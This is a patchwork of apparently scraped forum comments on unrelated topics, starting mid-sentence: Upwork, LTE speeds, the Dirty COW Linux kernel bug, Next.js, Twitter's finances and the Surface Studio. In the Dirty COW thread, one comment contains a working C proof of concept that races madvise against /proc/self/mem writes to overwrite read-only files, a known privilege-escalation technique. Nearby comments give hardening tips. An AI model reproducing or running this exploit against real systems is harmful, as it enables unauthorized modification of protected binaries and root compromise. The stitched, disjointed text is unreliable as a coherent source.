allow recovering money from people whose screenshots show they weren't working). They address the privacy issues somewhat in that the freelancer can delete any screenshots they like before sharing with the client. They just don't get paid for those 10 minute windows.

OK, that's my little essay on the Upwork experience. Upwork isn't perfect, but no large marketplace is. Keeping bad actors out of a marketplace is a really really hard problem, and I don't think it's possible for them to eliminate bad behavior. Still, I hope they kick that client off the platform and take this incident as a wake up call to invest more in improving their dispute resolution processes.

A quick reminder that 4G != LTE. The 4G specification requires a minimum speed [1], so LTE was launched to avoid exactly this minimum. It seems the companies did it right by launching LTE instead of 4G, as they could have lost their 4G status, while now they can drop as low as 3G speeds and still be called LTE (which is ironic in itself).

This wasn't mentioned at all in the article, which uses 4G and LTE interchangeably, something I find troubling.

Traditionally the way that carriers deal with bandwidth congestion is to wait until people start screaming (and networks start breaking) before they invest in innovation. There are a bunch of technologies that could ease congestion and deliver significantly better wireless performance but they would require an investment that doesn't make sense for carriers (it's not like carriers can extract more money from you if the network is better...).

That is to say, subscriber ARPU does not increase with network investment, so why invest in the network until it becomes a drag on subscriber growth?

Source: I was a manager at AT&T when the network in San Francisco basically died with the introduction of the iPhone 3G. It stayed that way until AT&T added new towers and upgraded the software on the towers for better spectrum utilization.

Living in SF, I haven't really noticed this, which the article bears out. I was actually just commenting in one of our Slack channels at $work that it's still kinda weird to me that the internets are, on average, at least 4x faster (throughput, not latency) on my phone vs my home internet service (bonded DSL).

EDIT: Out of curiosity, I just checked again, first on LTE and then on WiFi:

Mobile networks, in a way, seem destined to be victims of their own success. I find that no matter what mobile bandwidth I'm getting, I can always use more. For example, I'm considering adding a dedicated hotspot to my existing plan, just for my car. The better it works, the more I want to use it. And by "it", we are talking about a fixed physical infrastructure, otherwise known as a capital investment.

"There is no doubt that the US will need to set up the infrastructure to keep pace with the rapid changes in usage and content expected in the future. Like any instance of supply and demand, we will continue to see a give and take in this market. As operators catch up to the current demand and LTE becomes faster, users will opt to use it over others thus creating greater demand, supply scarcity, and decreased performance. At which point the cycle will begin again."

TL;DR Expect more network management in the future due to heavy demand of a constrained resource.

I think that control of content is one of the major reasons for this. If users could more readily (and at zero cost to them) cache content when connected to local networks, then we would see less content transferred over 'higher-cost' networks.

Of course streaming services (I'm thinking more of Twitch than Netflix) for live content production are 'rather difficult to cache' in their prime viewing time.

I've noticed it big time in the northeast. I live on the road and work via a Verizon connection. Over the last 6 months, across 7 or 8 locations, I've gotten a full Verizon signal (with a booster) and very low speeds compared to a year ago. And speeds increasing at off-peak times (it's fast in the middle of the night) point to overloaded towers.

I know people love to hate on cell companies but it must be hell to try and keep up with demand that changes so rapidly.

Hey look, another example of why trying to sell the rights to light sucks.

We are going to see AT&T / Verizon / etc. go the way of Comcast soon. The cost to improve service is high enough, the overhead of trying to get more spectrum when they hit physical limits annoying enough, their revenues large enough, and the demand insane enough that they are going to constantly try to buy each other out rather than actually invest anything, until we have one big corrupt mess like Comcast is for physical wire service.

It seems like the inevitable outcome of having infrastructure services that should be public utilities instead provided by private companies competing over who can exploit the state for more unfair advantage, be it land-access rights for wire carriers or FCC bribing for spectrum.

What I don't get is: why can't I, as an app developer, specify what kind of data transfer rate I need and have the phone choose which connection type to use depending on the currently running software?

Like, if I'm doing push notifications or IRC, I'd tell the phone that I only need 2G speeds, and the phone would only connect to something faster than 2G if I open the web browser.

Right now, my phone registers on LTE as soon as it's in coverage, and it stays there, eating power like nothing else, instead of dropping into the relatively quiet, strong-signal 2G/3G/HSxPA cells and saving power.

I remember getting on VZW LTE reasonably early, with the HTC Thunderbolt (don't even get me started; that device was trash), and I consistently got 60-80Mb down. Now, in the same location, on the same carrier, with an infinitely faster LTE modem, I get maybe 5-10Mb if I'm lucky. Such a shame; it could've been transformative.

I went to a wedding in upstate New York last weekend, and on the drive up there were some areas where I had no 4G (or LTE, or whatever my phone gets), but anywhere it was available, it was substantially faster than what I'm used to from the densely populated areas where I spend most of my time. I assume this was because there were simply fewer people sharing approximately the same bandwidth.

This is an interesting read, but the comparison to other countries/regions omits any mention of population density. It's much easier to roll out public utilities in dense areas than in sparsely populated ones, and western Europe and Korea are more densely populated than the US.

Not that this excuses the big drop in speeds, but it makes the comparative piece a bit less relevant/accurate.

Does the actual report cover whether there are any differences across carriers? I know in the 3G era there used to be fairly significant variation between the companies which installed newer base stations without upgrading their back-haul capacity to match.

Yes, the more people that use it, the slower it goes, since people have to share the same bandwidth. However, given all the data caps, the faster the speed, the faster you hit your cap, so I guess you can look at the positive side.

mm: remove gup_flags FOLL_WRITE games from __get_user_pages()

commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.

This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix get_user_pages() race for write access") but that was then undone due to problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").

In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly (and do it better). The s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement software dirty bits") which made it into v3.9. Earlier kernels will have to look at the page state itself.

Also, the VM has become more scalable, and what used to be a purely theoretical race back then has become easier to trigger.

To fix it, we introduce a new internal FOLL_COW flag to mark the "yes, we already did a COW" rather than play racy games with FOLL_WRITE that is very fundamental, and then use the pte dirty flag to validate that the FOLL_COW flag is still valid.

At Appcanary, we're thinking about opening up our vulnerability database to be browsable and searchable by the public. If you're not sure which version has the patch for this vulnerability in your distro, here's what we know:

Look, the Azimuth people have forgotten more about reliable exploit development than I have ever known, but, no, as stated, this is clearly not true. Not long ago, pretty much all local privesc bugs were practically 100% reliable.

What I think they mean to say is that this is unusually reliable for a kernel race.

I still think, though, that the right mental model to have regarding Linux privesc bugs is:

1. If there's a local privesc bug with a published exploit, assume it's 100% reliable.

2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.

CVE-2016-5195: This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set. This is achieved by racing the madvise(MADV_DONTNEED) system call while having a page of the executable mmapped in memory.

Excellent example of why mounting the partition with system binaries (such as /usr) read-only is a good idea. CoreOS does this.
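If /usr lives on its own partition, this is just a mount option; an illustrative /etc/fstab entry (the device path is whatever your setup uses):

    # /etc/fstab -- mount the system-binaries partition read-only
    /dev/sda3  /usr  ext4  defaults,ro  0  2

    # temporarily allow writes for package upgrades, then flip back:
    #   mount -o remount,rw /usr
    #   mount -o remount,ro /usr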

Okay, I have no idea what to do. I'm not a security engineer and can't follow what this thing does, but I do have a couple of VPSes running my blog and a few other things. Now maybe there's an argument that I shouldn't be doing this if I don't completely understand all the ins and outs, but what the hell, I like learning about Linux.

So my question is: is simply updating and upgrading enough to protect me from this MOST DANGEROUS BUG EVER IN THE WORLD OH MY GOD YOU'RE GOING TO END UP PART OF A BOTNET AND HURT LITTLE CHILDREN!!1!!1!? Because that's how this reads to even a semi-technical reader. I mean, I know my way around the command line, but I'm at a loss as to what to do here.

Since for any serious bug that's published there are very likely a dozen private or not-yet-found ones, and considering how many networked devices run the Linux kernel, I would really like to see a better upgrade story for Android devices and any other Linux-inside gear that doesn't have a distro package manager to apply the fix. As little as I like obstructing tech companies with more laws, especially since most lawmakers don't understand the tech, I feel like laws are the only pressure we can hope for. This is why the abuse of IoT devices is a good thing: it will highlight how dangerous it is to slap a random Linux version in some device and never bother with updates. A fleet of smart TVs needs to be hijacked with a stalker trojan that people then use to record, and later post online, private moments of unsuspecting owners of always-standby smart TVs, Amazon Echo networked microphones, etc. That's just how the world works: it doesn't realize the risks and do something about them until it's forced to.

As an engineer you can argue and plead with management not to release something for which you don't intend to provide timely updates over a well-communicated support period. Like a prominently communicated 2-year warranty, this would highlight to consumers that it's unsafe to use the device unless it's disconnected from the network - just like a car that doesn't pass your local safety regulations is not allowed into public traffic.

Actually, I'm surprised modern cars do not require periodic zero-expense-to-the-owner software updates at licensed dealerships. You can explain to a driver that tires go bad because they drove X miles and have to be paid for, but you cannot argue that software updates need to be paid for because Y days have passed since they bought the car. Take the Samsung battery optimization that went wrong, where the separation layer was a tiny bit too thin: it's fair to assume some regulation will follow for safety purposes. Similarly, networked devices, which are not (and cannot be?) microcontrollers with a mere 500 lines of code, have to be regulated in terms of software updates.

Now you may say the industry will go broke if they're required to provide upgrades, or that fewer devices will be made, but I think this will lead to consolidation of the software stack, which is mostly a good thing, as those who want to produce dozens of cheap IoT devices can do so without hiring kernel developers. It's like other industries, where cheap toy makers source materials like plastic from vendors knowing it's safe, or create the materials following a detailed, certified recipe.

Can someone help me better understand how this works, or perhaps point me to a decent article explaining more of the details? Most of the articles I can find just briefly explain the exploit, but not really how it works (in detail).

From looking at the example code, it seems like the general process is:

- Open some (normally un-writable) file as read-only and mmap it in to your process.

- Kick off two threads. One thread to repeatedly write to the same mmap-ed address via /proc/PID/mem and another thread to keep issuing the madvise call.

- Wait for the race condition to be hit such that you're able to write to the cached copy of the file.
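For the curious, here is a condensed sketch of that flow, modeled on the publicly posted dirtyc0w.c PoC (error handling trimmed, iteration counts arbitrary):

```c
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

static void *map;           /* read-only, private mapping of the target file */
static const char *payload; /* the bytes we want to sneak into that file     */

/* Thread 1: keep telling the kernel to throw away our private COW'd copy. */
static void *madvise_thread(void *arg)
{
    (void)arg;
    for (int i = 0; i < 100000000; i++)
        madvise(map, 100, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: keep writing at the mapping's address via /proc/self/mem,
 * which reaches the page through get_user_pages() rather than a normal
 * page fault, racing against the madvise() calls above. */
static void *procselfmem_thread(void *arg)
{
    (void)arg;
    int fd = open("/proc/self/mem", O_RDWR);
    for (int i = 0; i < 100000000; i++) {
        lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
        write(fd, payload, strlen(payload));
    }
    return NULL;
}

int main(int argc, char *argv[])
{
    if (argc < 3) {
        fprintf(stderr, "usage: %s target_file new_content\n", argv[0]);
        return 1;
    }
    payload = argv[2];

    int fd = open(argv[1], O_RDONLY); /* we only have read permission */
    struct stat st;
    fstat(fd, &st);
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);

    pthread_t t1, t2;
    pthread_create(&t1, NULL, madvise_thread, NULL);
    pthread_create(&t2, NULL, procselfmem_thread, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}
```

If a write wins the race, it lands on the original page-cache page backing the read-only file rather than on the process's private COW copy, and the kernel can later write that page back to disk.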

What I don't fully understand is how the /proc/PID/mem thing works.

Here's what I'm curious about:

1. What would happen if you tried to write to the mmap-ed region directly? Since it's been mapped in with PROT_READ, does this mean that you'll get a segmentation fault or something? From the manpage, it seems like MAP_PRIVATE allows it to be a COW mapping, but I don't see how the combination of PROT_READ and MAP_PRIVATE is even valid. Unless this means that any writes to data copied from the mmap-ed region into other buffers will be COW-ed, and that you can't actually write to the mmap-ed region itself? That would make sense to me.

2. How is writing to /proc/PID/mem any different from writing through the mmap-ed region directly? Assume that you weren't running the madvise thread. What would happen then if you tried to write to the /proc/PID/mem file? Presumably the same thing that happens if you just tried to write to the file directly?

3. Finally, how does the madvise call cause a race condition? I realize this might be a little too much to cover in a comment, but this seems like the meat of it.

Doesn't seem like it works on a $10 DigitalOcean droplet (1 vCPU) with grsec-patched 4.4.8. After running for quite some time (which I suspect a system administrator would notice) "cat foo" still outputs the same contents.

The github page [0] states that "The In The Wild exploit relied on using ptrace." Now, I'm wondering what purpose ptrace serves, aside from debuggers? Why don't we just disable this by default on production systems (where you shouldn't be debugging anyhow)?
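For what it's worth, ptrace also backs tools like strace, so it isn't only interactive debuggers. If your kernel includes the Yama LSM, you can already restrict or disable PTRACE_ATTACH system-wide via a sysctl; a sketch, equivalent to `sysctl kernel.yama.ptrace_scope=3` (assuming Yama is enabled):

```c
#include <stdio.h>

int main(void)
{
    /* Yama's ptrace_scope values:
     *   0 = classic ptrace permissions,
     *   1 = a tracer must be an ancestor of the tracee,
     *   2 = only processes with CAP_SYS_PTRACE may attach,
     *   3 = no PTRACE_ATTACH at all (cannot be relaxed without a reboot). */
    FILE *f = fopen("/proc/sys/kernel/yama/ptrace_scope", "w");
    if (!f) {
        perror("open ptrace_scope (is Yama enabled?)");
        return 1;
    }
    fputs("3\n", f);
    fclose(f);
    return 0;
}
```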

Interesting! I really like the architecture here. I think the next major opportunity for abstraction is all the server/client detection you still have to do. Do I want `request.headers['Cookie']` (server), or `document.cookie` (client)? Do I want to create a fresh Redux store (server), or hook into a global one (client)?

It's definitely not hard for community members to build these abstractions themselves (`cookies = (req) => req ? req.headers['Cookie'] : document.cookie`), but some of these are going to play into major use cases like authentication, so, as Next matures, it'll start to make sense to provide these especially common abstractions out of the box.

That said, these are next steps; the first release is all about showcasing the fundamental architecture, and it's looking gooood :D

I'm a little confused about the benefits of server side rendering. I thought the point of these js UI frameworks was to make the client do a bunch of the work? Can anyone give me some of the upsides? Thanks!

Very cool. I can't wait to try it after five years in Node land. The people behind zeit.co are great minds in the community.

It is funny how concepts come and go in circles. ASP.NET offered unified client and server development, though mostly in C#. It had the NuGet package manager and a VS store or something, but it was never as amazing and packed as npm. Partial page postbacks and page state in encrypted strings... yikes. Now we have that in Redux, I suppose. It is all so familiar, yet so much better now.

Surprised to see that after 10 hours no one has mentioned intercooler.js, which is a stepping stone in the direction that developers focused on the "server" part of "server-rendered" might head without going as far as Next.js.

Awesome, it took me less than 10 minutes to create a basic server-side newsreader app with React. The simplicity of PHP and the power of React, combined and brought to Node. I also like how the console.log statements are shown in the dev console.

Meatier also uses Babel, React and Node.js, except that it has been around for almost a year and is already stable. They've already solved all the difficult issues like realtime pagination, authentication, GraphQL, etc...

This sounds great for static websites but I'm not sure if it's a good idea for a dynamic web app where data needs to update on the screen in realtime. Some questions which come to mind:

What if you had a 'chatbox' component which updated every time a user wrote a message; would Next.js have to resend the entire HTML for the 'chatbox' component (containing the full message log) every time a message is added to that chatbox? Am I right to assume that only the affected component will be rerendered? Or does the entire page have to be re-rendered (and the entire HTML of the page resent over the wire) for every change in data?

It sounds like a nightmare for caching: if data is updated dynamically and you constantly have to rerender components in realtime on the server side, you can't really cache every permutation of every component's HTML for every data change and for every user... That's insane.

Regarding CPU, it sounds like it's going to eat up server-side performance and increase hosting costs massively! What, like 10 times? 100 times? Are there any benchmarks done on performance for a typical single-page app built with Next.js?

Then there is the latency issue...

Finally; if we move back to full server rendering and get rid of the need for client-side code; why would we want to stick to JavaScript?

I haven't used it yet so please correct me if I'm misunderstanding something.

I love the addition of async `getInitialProps` (more for being async than for getting props; getInitialState would be just as fine for me).

The logic for rendering a loading screen in a component can quickly get tedious and annoying; such a pattern helps provide a global loading screen while still allowing the component to be responsible for how to fetch its data.

I don't understand why you need any client-side framework. Couldn't this all be accomplished server-side, with the HTML pre-fetched on the client if needed for performance? There isn't anything dynamic about the website, so it could run with zero JavaScript, and then things like the back button after scrolling through the blog would work.

So if I understand correctly, this would 'transform' Node into a web framework à la Django? Please correct me if I misunderstood. If that's the case, how will Node server rendering compare to Django, Flask and other Python web frameworks?

Is performance better on Node? Feedback from the trenches would be appreciated.

Having to put your program in a string makes it hard to edit. Syntax highlighting, static analysis, and tooling in general that helps you filter out problems might not work there.

To me, tooling is very important, since software is more consistent/reliable/productive at simple repetitive tasks like matching parentheses, braces, and quotes... In my case I take it further, documenting types via documentation tags and verifying that function signatures and return types match. That alone saves me a lot of time once the code has grown past 1 kSLOC.

Off-topic, but what process are people using to make these animated demos? The command-line and browser demo on this page is so clean and crisp. Is it just a screen cap with a ton of post-processing, or is there more to it?

JavaScript development on the web has become such a mess... Web apps are totally bloated: tons of JavaScript loaded, server-side rendering for search engines, mixing CSS, HTML and JavaScript together to have a component framework that actually runs within JavaScript... not within the browser engine... It's library on top of library on top of library... Really..? The W3C should come up with alternatives that also work as mobile apps... The web has become an overengineered mess.

I've always sort of had this question that continues to feel naive - but I'm not sure I know the answer: why do so many companies feel like they have to grow perpetually? Why can't Twitter just be happy being Twitter, knowing its limits and making a stable profit? Instead it's more users, more VC money, more staff... constantly burning cash as quickly as possible. There's a ceiling on every business; it's all bound to come crashing down eventually if you don't stop somewhere. Either you do it gracefully, or hundreds of folks eventually lose their jobs unexpectedly (very sad).

Is the answer simply that earlier VCs put pressure on the executives to keep growing so they can multiply their investment?

Personally I dream of making a living establishing a patio11-type software business. Something where I can do a high quality job and own all of the decision-making. The ceiling doesn't have to be very high for one guy to sustain himself, and software is appealing because you can automate away nearly all of the "work".

I still maintain that screwing over client developers had something to do with it. At the very least it didn't help them "control the twitter experience". Every time I see one of their new ads about how much Twitter loves developers I laugh out loud. There is zero chance I'll ever integrate Twitter into anything I do, period. I'll fight against it anywhere I work and encourage all my peers to do the same.

Did everyone forget they didn't even invent the word "Tweet"? Nor did they write their mobile clients. They had no idea what they were doing and stumbled into success. Then the MBAs turned around and stabbed us in the back.

No offense to the people I know working at Twitter, but these cuts aren't deep enough to stem the losses.

While Twitter revenue grew from $664M to $1,403M to $2,218M over the past three years, it is going to be a lot flatter than that at the end of this year - and despite that growth they've consistently been losing about $500M p.a. ($645M, $577M and $521M respectively).

3,800 people work there - and equivalent cuts last year can barely be noticed on the financials.

The good times are over - they've spent billions over the last few years and not done anything to save them from flat user growth. They really need a wholesale shakeup and doing it over time, like Yahoo did, will just make it worse.

edit: here's a more brutal analysis [0][1]:

> PS. Twitter staff - I am not exaggerating. Look at the young man on your left and the young woman on your right. Only one of you three will keep your job.

You'd think they would have figured out targeted ads by now. If I follow people who post about RF/Microwave, antennas, SDR, and ham radio, one would think I'd see ads from Keysight and Tektronix, but no, it's garbage like football and pop music. FAIL!

I also don't like that I don't see all the tweets from a person. They are pruning the timeline.

Twitter is by far the #1 service I use every day. It's been the most valuable to me from a networking perspective, where I've made friends and professional connections. I also happen to be a shareholder. It's been disappointing to watch Twitter try to become a business and completely fall flat.

The acquisitions of Vine and Periscope haven't led to much, and the user growth from live video is still to be seen.

The product is immensely complicated compared to something like Instagram or Snapchat. It manages to be everything and nothing at the same time. I've been a fan of Jack Dorsey's work at Square, but monetization is a completely different animal in that industry.

To summarize, I just don't know what the future of Twitter as a business will hold, but I guess I'm here for the ride.

Can we talk about Fabric again? Fabric [1] is a product by Twitter that heavily de-emphasizes the Twitter association -- it's a value-added Twitter SDK that apps can build into themselves to get crash reporting (ex-Crashlytics) and ad network integration (MoPub) too.

In the scheme of Twitter's self-reflection, trying to figure out how to cut costs and what it wants to do, do you feel Fabric fits in? Do you feel the 'core platform', i.e. the microblogging site, fits in? Should the less strategic of these be spun out, or should they be less separated?

Apart from killing their third-party ecosystem, I think Twitter's biggest failure has been their inability to monetize their huge celebrity and brand base, and I wonder if this partly has to do with their "verified account" system. How to charge celebrities/brands without pissing everyone off?

Top-tier celebrities and brands can and would easily fork out high fees to use Twitter. But Twitter can't just charge some blanket fee to verified accounts, because right now "verified accounts" are not exclusive enough. They also include "key influencers", bloggers, industry people, and other hangers-on (let's call them Group B), who can't/won't support the high fees and would revolt.

Twitter could try and create a new way to categorize celebs/brands, but that would confuse things and may make Group B users feel less elite: so they'd revolt as well.

I've thought long and hard about why I believe Twitter as a service isn't very valuable to me, and I think I've come up with the answer. Twitter is great at delivering live information. If I'm following my favorite artist on Twitter, then I know immediately when his album drops. However, that one important tweet that matters to me is mixed in with a hundred other tweets of people I follow retweeting or posting irrelevant things. For that reason the situation in which Twitter truly shines for me (instant, up-to-date information) is overshadowed by the fact that many people also use Twitter to post funny things which I don't care about.

My sense is that while Twitter has been able to hire some very talented engineers (incl. but not limited to those I know personally), the high-level technical leadership hasn't been particularly successful.

Is there room for an independent 'moonshot' team reporting directly to the board?

Wonder if Twitter will end up like Delicious. Even with Pocket, Diigo and such, I'm not sure what people use to save bookmarks these days. Delicious went through several hands; Diigo was almost there, but their bookmarklet doesn't let you know if you already have something tagged. Delicious abandoned their FF plugin, so it's basically not worth using the site anymore.

I'll be honest, I won't miss Twitter if it dies out, as I'm not a user. The thing I hate is how Twitter killed RSS for many browsers and users. So if Twitter dies, so be it, for causing that to happen.

I can always tell when Twitter is in trouble, because I get a security notice from them that there has been suspicious activity on my account, it has been locked, and I need to login with an assigned password. (I never use my Twitter account). Happened after the last quarterly earnings report and also yesterday.

In other words, "We need more active users, so please log in soon so we can count you as an active user."

I don't really have any insightful input into this other than to say, I hope they're cutting the people they most likely don't need.

Twitter is the only social platform I actually like and still use, and the only thing that could replace it would be similar but decentralised and as widely adopted.

Why / where are they failing - are they failing? I know more people on and using Twitter than ever, many of those have left other aging social networks after finding them irrelevant or too invasive of privacy.

Twitter is simple, Twitter is what it is and it doesn't try to be more than that, it does what it does well and it always has done. This - I enjoy in a product.

Came here to say that I love Twitter and am online on it far more than on any other service.

I even clicked on its served commercials, because Twitter has my professional network and managed to score some ads that triggered my interest, versus on Facebook, where I have a list of friends and acquaintances with whom I've got little in common.

Their problem is their ad inventory and their targeting. They should serve more ads and improve their targeting.

One of Twitter's problems is not properly controlling their feed. I never use their mobile or web client; I solely use a highly customized TweetDeck. With this experience, I never once see an advertisement. That's a huge loss for Twitter.

Perhaps it's just me, but I wouldn't have a problem seeing advertisements in my Tweetdeck feed if it meant they'd remain successful. I'd much rather see Twitter succeed as it's the only platform I use to keep up with thousands of professionals and news sources. It's entirely a different experience than Facebook.

I think the Twitter community should suck it up and accept the fact that they get served a couple of advertisements in order to support a news service and content delivery network unlike any other in existence.

Something I've never been able to wrap my head around is how does Twitter make money? I mean real money. Not valuation of eyeballs, not VC cash, but honest to God profit? It has always baffled me and I wish I knew what the unicorns say to the VC's when (hopefully) someone asks this question.

I feel like a takeover is only a matter of time. If you're Alphabet or Facebook you're probably interested (I'd say Alphabet should be more interested, for Facebook it's probably mostly a blocker play). The question is how long do you let them "rot" to drive down the acquisition price?

I'm just back from a holiday in southeast Asia. All the time I was there I was getting ads on Twitter targeted to the local market (in the local language), presumably based on my roaming IP.

Maybe my grasp is a bit simplistic, but isn't this just intensely stupid? My Twitter profile is explicitly Western European; is Twitter's location-based advertising really just as dumb as matching IP addresses to regions?

If I were an advertiser I wouldn't be too happy about twitter claiming 'impressions' like this.

Twitter lost the trust of many users and are now suffering the consequences. It was once supposed to be the place for the freedom of speech and truth and is now just another arm of the left-leaning politicians in the US.

So many conservative/libertarian political figures and personalities have been permanently banned from Twitter in the last year for only posting an opinion that it can no longer be chalked up to circumstance.

$2,999 and the best GPU option is a last-gen mobile card? The default 965M is a crappy budget card (half the performance of the 980M), and if you want the 980M you have to pick the $4,199 configuration.

And hybrid drives!? This thing starts at $2,199 and you can't even get a full SSD? I know 2D designers probably won't mind the GPU, but they could definitely benefit from a true SSD.

Hell, the recently announced Razer Blade Pro has top of the line everything (including a desktop GTX 1080 GPU, 1TB SSD, and 4K screen suitable for photo/video editing) and it still costs less than the 980M Surface Studio: https://www.wired.com/2016/10/razer-blade-pro-laptop/

I must be missing the value proposition here because that price seems absurd, especially for a computer presumably geared towards professionals.

That looks pretty awesome, and it makes the iMac seem even more tired, which I assume was intended. It is startling to see a story about IBM extolling the virtues of MacBooks for business alongside Microsoft launching a platform targeting designers; it really is amazing. But setting all of that aside for a moment....

The screen. Clearly that is the thing which makes this announcement. For me, the 3:2 aspect ratio is so much more reasonable for computers than 16:9. And having a zillion pixels is wonderful, although my CAD package (TurboCAD) still doesn't deal well with the high-DPI screen of the Surface Book, so I'm sure it would look silly on this machine.

My experience with the Surface Book tells me that the PixelSense technology is really great for drawing. I have both it and the iPad Pro and, not too surprisingly at twice the cost, in my opinion the Surface Book's drawing experience is better than the iPad's. I base that opinion on the precision of the drawing, the expressiveness, and the response time.

Touch. Microsoft is really doubling down on the whole touching thing and so far Apple has stayed away from it with its compute platforms. That is both a strength and a weakness. The rest of the ecosystem doesn't always understand what to do, so you get controls that are too small to use your finger on sometimes, and odd sort of multi-monitor experiences where things appear on one screen and then when you resize them they jump to the other and try to adjust for "touchiness".

If the tools people can get their act together -- and by that I mean the designer tools (I for one would love to see a schematic capture and board layout system that was touch and pen enabled) -- then I think it is only good news for Microsoft; if they can't, then Apple will look really smart for not adopting a "gimmick".

I can't help but feel sad that Microsoft is somehow dropping the ball on mobile despite having been, briefly, in a prime position to succeed. They've executed well with their "One platform" strategy. UWP is great, and with the new composition API they're finally moving into being able to compete in the modern software arena. Meanwhile, on the hardware side, Panos is basically doing what Apple should have been doing if they had any creative leadership left... but it doesn't matter; for some reason they seem to have abandoned mobile despite having all the pieces in place.

Their mistreatment, lack of support, and lack of quality assurance on the mobile side of the platform have been dismal. It's very weird: obviously they can do hardware, they have the ecosystem to back them up, and the API teams have been doing some great stuff when it comes to W10, yet they seem to have given up on mobile.

I must say I don't understand it; how can such a big player as Microsoft abandon such a strategic area of their ecosystem? I understand that it's hard to be profitable in the harsh reality of consumer electronics and that the money is in business... but if you're not in mobile, you're leaving a gaping hole in your ecosystem that leaves the other parts vulnerable. I don't understand why they don't simply pour resources into mobile with the same enthusiasm as tablets/laptops and gaming.

At first I applauded Microsoft for continuing to advance the desktop computer market. This is something I wish Apple would continue to invest in, but it's clear they're moving towards building machines for the engineers who build iOS software.

However then I jump into the Microsoft store and check it out...

$4,199.00 for the high-end option gets you a hybrid drive, probably connected over an older SATA bus, and a graphics card from last year? USB 3.0 only and no Thunderbolt?

Is this a system that was designed last year and it took a full year to get to production?

Sorry if I'm being bitchy, but to me this is typical Microsoft: only going 80% of the way.

With its Subsystem for Linux aimed at developers and now this desktop PC for designers, it seems Microsoft is quickly catching up with Apple. Now if they could release a good alternative to the MacBook Pro that would be great.

I'm not sure why you need the world's thinnest LCD for a desktop, it's not like you'll be mounting it on a wall or something.

By the way, that presenter is a pretty good actor, but he was trying way too hard in a way that was distracting. The way he called out someone in the audience at one point made it seem like he has standup comedy experience and was trying to connect with the audience but it made no sense.

Nvidia GTX 9xxM: from what I understand, the 10xx cards offer the biggest generation-to-generation performance gain seen in a while on the mobile side - the 10xx mobile versions are basically identical to the desktop versions, while the 9xx are not even close - so why put last-gen mobile tech into a high-end professional desktop product? Especially considering the likelihood of VR proliferating in content creation, I couldn't justify buying this, given the price tag.

As a software engineer, this is not something I need. I have realized that because computers are designed and programmed by engineers, we had what we needed from the very beginning. I am glad that now it's the designers' turn to get some tools.

Great hardware, interface ideas look really interesting too. This could actually be some vision that can get mainstream in the future.

I would seriously consider buying one, if not for one thing: the OS. After recently installing Windows via Boot Camp I can honestly say that I hate the thing. It made me swear constantly for 15 minutes. I wish MS would finally write a new OS from scratch. They seem to have the right idea about where to go, but Windows looks like a 40-year-old after a series of plastic surgeries: it's supposed to look young and modern, but once you get past the surface you can see all those menus that are almost two decades old.

I probably won't buy one of these, just as I didn't buy the first iteration of the Surface, but I will definitely consider future iterations. If anything, these products greatly boost my estimation of Microsoft as a brand. If I were still more in my photography/design days, I'd have a hard time resisting buying the Surface Studio (assuming its reviews aren't disastrous). For the past decade I hadn't contemplated buying anything besides Apple when it comes to PCs. Microsoft has made a great case for how much innovation can still be done in this field.

The feedback I am seeing for this product seems generally positive even with a lot of delight from some corners. It will be interesting to compare the feedback for this against tomorrow's feedback regarding the Mac announcement, a pillar of which seems to be the bar they've added to the Macbook Pro.

If I could get this screen (along with it working with the pen and the other accessories) but hook it up to my existing desktop I would be all over it. Even if it was still $2,200. But a 980M is just not going to cut it as my primary graphics card...

I can kind of understand the need for non-upgradable phones and laptops, since they are more useful when they're thinner and lighter. But stationary devices like this and Apple's iMac are unnecessarily wasteful.

As a side note, it's amazing to see that despite everyone ragging on Apple and claiming superiority to them, they all copy their advertising style.

The copy on the Google Pixel site and this site are both very obviously Apple-ish.

edit: downvote away; it doesn't change the fact that these websites scream "we want to be Apple". Though I will say, the tides are changing for Apple, judging by the number of people hurt by this comment.

A shame the OS is just terrible. Windows 10 is so hostile to me as a user, constantly pestering me about updates or missing DLL files. Bleh. I installed Plex in January; today, after not booting my machine for about a month, I wanted to watch a video and got some random missing-DLL error.

How a DLL can go missing while the box is turned off is a mystery to me, but there you go. I don't trust my Windows box.

I don't understand who this product is for: someone who is not a PC enthusiast but has $3,000 to spend on a PC? I guess the target audience is high-end design studios that need to outfit their stylish new office with matching computers that no one will ever use, because all the real work happens on people's MacBooks at home.

That said, I love the dial thingy. I think it has some great ideas behind it and is potentially also a nod to the incredibly popular Griffin PowerMate, which I believe is still a popular product.

$3000 for a machine with anemic specs is going to be a tough sell. Who exactly is this computer for? As for that puck device - I couldn't help but laugh when the presenter, dressed in all black as if attending a funeral, used it to emphasize how passionate his scribbles were on a document. Who does that? Who would ever do that? And more importantly, who ever thought this would be something you would even want to devote time to demo?

The marketers and advertisers have finally won. Google hasn't been an engineering company for the last 5 years maybe, but this confirms it. It's like Facebook, they're beholden to the non-developers and non-software engineers who frankly don't care about other people's privacy and only see the dollar bills.

So glad I'm evaluating other email providers and use Privoxy for ad-blocking.

I'd just like to draw people's attention to a little bit of conflict-of-interest research some Stanford University researchers published a few years ago:

Currently, the predominant business model for commercial search engines is advertising. The goals of the advertising business model do not always correspond to providing quality search to users. For example, in our prototype search engine one of the top results for cellular phone is "The Effect of Cellular Phone Use Upon Driver Attention", a study which explains in great detail the distractions and risk associated with conversing on a cell phone while driving. This search result came up first because of its high importance as judged by the PageRank algorithm, an approximation of citation importance on the web [Page, 98]. It is clear that a search engine which was taking money for showing cellular phone ads would have difficulty justifying the page that our system returned to its paying advertisers. For this type of reason and historical experience with other media [Bagdikian 83], we expect that advertising funded search engines will be inherently biased towards the advertisers and away from the needs of the consumers.

